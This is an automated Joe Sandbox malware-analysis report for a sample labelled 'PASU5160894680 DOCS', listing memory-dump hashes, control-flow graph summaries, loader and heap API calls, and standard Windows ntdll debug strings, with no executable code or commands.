                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 687985caed476945528a97145ad51192868c534ff403a13482436aec6bf05e8c
                                                                • Instruction ID: 24cf0f7bc0a1eddf225122eb96870aedc614945b16d23930bb929181c0eebd4b
                                                                • Opcode Fuzzy Hash: 687985caed476945528a97145ad51192868c534ff403a13482436aec6bf05e8c
                                                                • Instruction Fuzzy Hash: 8C212B71504204DFDB05DF54E5C1B66BFB6FF98320F24C969D9090F246C376E416C6A1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 888eeb4287b0290c2e90d337cca6afa630db1c25f4852a634feefcb5fa283603
                                                                • Instruction ID: b6dd4182e3d7e7da1ef9e8d4ea0a3f845aacd30940ed293a4f99fba556826392
                                                                • Opcode Fuzzy Hash: 888eeb4287b0290c2e90d337cca6afa630db1c25f4852a634feefcb5fa283603
                                                                • Instruction Fuzzy Hash: 74212271604204DFDB15EF98D880B2ABBF5FB88314F24C96DE94A5F286D33AD407CA61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d9b42cb47fb07d35a1e10c98b9eb215c393964a70440b745e194310d651e210
                                                                • Instruction ID: 8cc17a6a3266c60f65e2174f6ab5c1d7a15c882a5cacc1b8576015887500d015
                                                                • Opcode Fuzzy Hash: 3d9b42cb47fb07d35a1e10c98b9eb215c393964a70440b745e194310d651e210
                                                                • Instruction Fuzzy Hash: 1521F571604204DFDB05EF98D5C0B26BBF5FB88324F24CA6DE94A5F292C33AD406CA61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1538035843e7704e63ac88a08cd538ffcb82733237ddae632a0d02ac7bfeaf8b
                                                                • Instruction ID: 1cb11086c3f5bc5791c9e00d623b78867c15dde5a2b8b14cbf53ac0b8bc8756d
                                                                • Opcode Fuzzy Hash: 1538035843e7704e63ac88a08cd538ffcb82733237ddae632a0d02ac7bfeaf8b
                                                                • Instruction Fuzzy Hash: 3F217F75509380CFDB12DF64D590715BFB1FB46214F28C5DAD8498F2A7C33A980ACB62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709947643.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_157d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                • Instruction ID: fa0c89db96170fcbe6dfe8583c4f3e3accd1d99ac3c9847e8679d8ce3ba561c6
                                                                • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                • Instruction Fuzzy Hash: D711DF72404280CFDB02CF44D5C4B5ABF72FF84320F24C6A9D9090B656C33AE45ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1709991091.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_158d000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                • Instruction ID: c37f2ba7da54ba59bca0f348fb2d30f86ae0627545a46c6cc6fe67e663f951c8
                                                                • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                • Instruction Fuzzy Hash: 0711BB75504280DFDB12DF58C5C0B19BBB1FB84324F24C6A9D84A4F296C33AD40ACB61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70d9a023b55ccc520aa44598a6656dcfa68a549799bfc09ebdd6a0bf8852c493
                                                                • Instruction ID: 7161d67fa20b41015087b483d0971f6d3ee659896a43d618bb9ae739d4dc6a03
                                                                • Opcode Fuzzy Hash: 70d9a023b55ccc520aa44598a6656dcfa68a549799bfc09ebdd6a0bf8852c493
                                                                • Instruction Fuzzy Hash: 3BD11A7592071BCACB01EBA4D991699F7B1FF99300F11D79AE40A3B260FB706AD4CB41
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad0ea069e2b5444fbc1dfa38fa24135d56bfa5397648477a90bb3e231c39584b
                                                                • Instruction ID: f48d361c273e8bf609acd8bba8088aabe6f5a9715ad6e3206e1f32dad44e9807
                                                                • Opcode Fuzzy Hash: ad0ea069e2b5444fbc1dfa38fa24135d56bfa5397648477a90bb3e231c39584b
                                                                • Instruction Fuzzy Hash: D3D1097592071BCACB01EBA4D991699F7B1FF99300F11D79AE40A3B260FB706AD4CB41
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1710499885.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1850000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3f1a3d9fe1c2c7dd660a6a22e7b31f639058dade143f3f56e7dcf020c4865f6e
                                                                • Instruction ID: 62c061ea1e2e7899d6de2b0486b5d84a46fa6d114c0b3acbd7ca4cfc3025014c
                                                                • Opcode Fuzzy Hash: 3f1a3d9fe1c2c7dd660a6a22e7b31f639058dade143f3f56e7dcf020c4865f6e
                                                                • Instruction Fuzzy Hash: 06A16E32A002198FCF19DFB9C88459EBBB2FF95300B15456AEE05EB265DB31EA05CB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1716604851.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_1ab0000_PASU5160894680 DOCS.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6f540a815e37c03d53ebd3040b86046caa63f9e748af0f10c117a1cfbaf4b47
                                                                • Instruction ID: 791379aec2f21d032587f14f062e1ee4e4e7099c9be2f329e475d93e00398502
                                                                • Opcode Fuzzy Hash: f6f540a815e37c03d53ebd3040b86046caa63f9e748af0f10c117a1cfbaf4b47
                                                                • Instruction Fuzzy Hash: 8A1199B1E157589BEB28CF6B8C407CAFAF7BFC9300F04C1A9D509A6255EB3419858F51

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:5%
                                                                Signature Coverage:8.6%
                                                                Total number of Nodes:140
                                                                Total number of Limit Nodes:13

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 91 417283-4172ac call 42edb3 94 4172b2-4172c0 call 42f3b3 91->94 95 4172ae-4172b1 91->95 98 4172d0-4172e1 call 42d743 94->98 99 4172c2-4172cd call 42f653 94->99 104 4172e3-4172f7 LdrLoadDll 98->104 105 4172fa-4172fd 98->105 99->98 104->105
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172F5
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction ID: b8e9ec97489930ceb070e3c8e335ec216fb0a7430ed99e7a48e9c59897d2eb09
                                                                • Opcode Fuzzy Hash: fe612aa3d1b5742517d37b12b3a612cca01b15546c8e7c8025a9886ca340d8ad
                                                                • Instruction Fuzzy Hash: 750152B5E0020DA7DB10DAE5DC42FDEB3B89B54308F0081AAF90897240F634EB498B95

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 116 42c003-42c03c call 404593 call 42d253 NtClose
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction ID: 7d7d02806afba75d350ac5760a8f26f5e734a2091cb1580d582ff9fe802a1f2d
                                                                • Opcode Fuzzy Hash: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction Fuzzy Hash: 6BE086316002147BD610FA9ADC01F97775CDFC5714F04802AFB5CA7181C670B90187F4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 132 5612df0-5612dfc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                • Instruction ID: 5e137bf6e0f84ae1d0f88f385d1b493d9caa7acd8c0056b2961ad9ebc1fd996a
                                                                • Opcode Fuzzy Hash: c2025168d0cc196f93259b103b67f9a9763567bfafb95aee52ebd80bf2f597fd
                                                                • Instruction Fuzzy Hash: 1890023220191413D11175584945707001987D0241FD5C412A042475CE9E568A52E521

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 131 5612c70-5612c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                • Instruction ID: b6bde56269cf1e6d8a64afd89c4d6299ff91fb68fbc2c33da7a70cb5c557ade3
                                                                • Opcode Fuzzy Hash: fb1fe55e9b621635712f2e59d1ae1979246687f854cf7e638a0775573011059c
                                                                • Instruction Fuzzy Hash: 9990023220199802D1107558884574A001587D0301F99C411A442475CE8E958991B521

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 130 5612b60-5612b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:

                                                                Control-flow Graph

                                                                control_flow_graph 133 56135c0-56135cc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:

                                                                Control-flow Graph

                                                                control_flow_graph 0 413a87-413a89 1 413a8a-413a8b 0->1 2 413aaa-413ab8 1->2 3 413a8d-413a91 1->3 6 413b15-413b4d call 417283 call 404503 call 424823 2->6 7 413aba 2->7 4 413a93-413a95 3->4 5 413a47 3->5 4->2 10 413a49-413a4c 5->10 11 4139fa-4139fe 5->11 33 413b6d-413b73 6->33 34 413b4f-413b5e PostThreadMessageW 6->34 8 413ae5-413b0f call 42e153 call 42eb63 7->8 9 413abc 7->9 8->6 9->1 14 413abe-413ac7 9->14 15 413a4e-413a50 10->15 20 413a52-413a72 15->20 21 413a26 15->21 20->15 25 413a74-413a84 20->25 23 413a28-413a2a 21->23 23->23 27 413a2c-413a33 23->27 31 413a86 25->31 32 413a1e-413a24 25->32 27->5 31->0 32->21 34->33 35 413b60-413b6a 34->35 35->33
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -zud0E$-zud0E

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(-zud0E,00000111,00000000,00000000), ref: 00413B5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: -zud0E$-zud0E

                                                                Control-flow Graph

                                                                control_flow_graph 52 413ae3-413af5 53 413afd-413b4d call 42eb63 call 417283 call 404503 call 424823 52->53 54 413af8 call 42e153 52->54 64 413b6d-413b73 53->64 65 413b4f-413b5e PostThreadMessageW 53->65 54->53 65->64 66 413b60-413b6a 65->66 66->64
                                                                APIs
                                                                • PostThreadMessageW.USER32(-zud0E,00000111,00000000,00000000), ref: 00413B5A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: -zud0E$-zud0E

                                                                Control-flow Graph

                                                                control_flow_graph 106 42c333-42c374 call 404593 call 42d253 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E021,?,?,00000000,?,0041E021,?,?,?), ref: 0042C36F
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:

                                                                Control-flow Graph

                                                                control_flow_graph 111 42c383-42c3c4 call 404593 call 42d253 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4B4A49C8,00000007,00000000,00000004,00000000,00416AF6,000000F4), ref: 0042C3BF
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:

                                                                Control-flow Graph

                                                                control_flow_graph 121 42c3d3-42c40f call 404593 call 42d253 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,966F2C02,?,?,966F2C02), ref: 0042C40A
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:

                                                                Control-flow Graph

                                                                control_flow_graph 126 5612c0a-5612c0f 127 5612c11-5612c18 126->127 128 5612c1f-5612c26 LdrInitializeThunk 126->128
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                Strings
                                                                • <unknown>, xrefs: 05688D2E, 05688D81, 05688E00, 05688E49, 05688EC7, 05688F3E
                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05688F34
                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05688DB5
                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05688DC4
                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 05688DA3
                                                                • The critical section is owned by thread %p., xrefs: 05688E69
                                                                • read from, xrefs: 05688F5D, 05688F62
                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05688F2D
                                                                • *** Inpage error in %ws:%s, xrefs: 05688EC8
                                                                • Go determine why that thread has not released the critical section., xrefs: 05688E75
                                                                • The instruction at %p referenced memory at %p., xrefs: 05688EE2
                                                                • an invalid address, %p, xrefs: 05688F7F
                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05688E4B
                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 05688F3F
                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05688F26
                                                                • a NULL pointer, xrefs: 05688F90
                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 05688E02
                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05688E3F
                                                                • The instruction at %p tried to %s , xrefs: 05688F66
                                                                • The resource is owned exclusively by thread %p, xrefs: 05688E24
                                                                • write to, xrefs: 05688F56
                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05688FEF
                                                                • The resource is owned shared by %d threads, xrefs: 05688E2E
                                                                • *** then kb to get the faulting stack, xrefs: 05688FCC
                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05688D8C
                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05688DD3
                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05688E86
                                                                • *** enter .exr %p for the exception record, xrefs: 05688FA1
                                                                • *** enter .cxr %p for the context, xrefs: 05688FBD
                                                                • This failed because of error %Ix., xrefs: 05688EF6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056454E2
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 05645543
                                                                • Invalid debug info address of this critical section, xrefs: 056454B6
                                                                • Critical section address., xrefs: 05645502
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0564540A, 05645496, 05645519
                                                                • undeleted critical section in freed memory, xrefs: 0564542B
                                                                • double initialized or corrupted critical section, xrefs: 05645508
                                                                • Critical section debug info address, xrefs: 0564541F, 0564552E
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 056454CE
                                                                • Address of the debug info found in the active list., xrefs: 056454AE, 056454FA
                                                                • corrupted critical section, xrefs: 056454C2
                                                                • Critical section address, xrefs: 05645425, 056454BC, 05645534
                                                                • Thread identifier, xrefs: 0564553A
                                                                • 8, xrefs: 056452E3
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                Strings
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 0564292E
                                                                • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 05642856
                                                                • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 05642881
                                                                • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 056429B1
                                                                • @, xrefs: 05603180
                                                                • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 056429AC
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 056428B2
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                Strings
                                                                • ***Exception thrown within loader***, xrefs: 05654E27
                                                                • Execute '.cxr %p' to dump context, xrefs: 05654EB1
                                                                • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05654DF5
                                                                • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05654E38
                                                                • minkernel\ntdll\ldrutil.c, xrefs: 05654E06
                                                                • LdrpProtectedCopyMemory, xrefs: 05654DF4
                                                                • LdrpGenericExceptionFilter, xrefs: 05654DFC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • @, xrefs: 05602E4D
                                                                • \WinSxS\, xrefs: 05602E23
                                                                • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 0564276F
                                                                • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 0564279C
                                                                • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 05642706
                                                                • .Local\, xrefs: 05602D91
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
